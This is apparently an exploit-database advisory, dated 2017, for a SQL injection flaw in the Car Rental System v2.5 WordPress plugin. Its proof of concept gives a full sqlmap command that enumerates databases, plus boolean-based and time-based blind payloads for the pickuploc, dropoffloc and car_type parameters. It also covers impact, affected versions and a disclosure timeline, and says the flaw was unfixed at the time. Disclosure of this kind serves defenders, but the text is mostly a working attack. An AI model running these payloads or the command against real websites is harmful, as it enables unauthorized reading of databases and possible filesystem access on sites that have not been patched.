# Exploit Title: Car Rental System v2.5# Date: 28/03/2017# Exploit Author: TAD GROUP# Vendor Homepage: https://www.bestsoftinc.com/# Software Link: https://www.bestsoftinc.com/car-rental-system.html# Version: 2.5# Contact: info[at]tad.group# Website: https://tad.group# Category: Web Application Exploits1. Description
An unescaped parameter was found in Car Rental System v2.5(WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameters 'pickuploc','dropoffloc',and'car_type' are vulnerable.2. Proof of concept
sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search="--dbs --threads=5--random-agent
Parameter: pickuploc (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
Type: AND/OR time-based blind
Title: MySQL >=5.0.12 AND time-based blind
Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
The same is applicable for'dropoffloc'and'car_type' parameters
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.4. Impact
Critical
5. Affected versions
<=2.56. Disclosure timeline
13-Mar-2017- found the vulnerability
13-Mar-2017- informed the developer
28-Mar-2017- release date of this security advisory
Not fixed at the date of submitting this exploit.
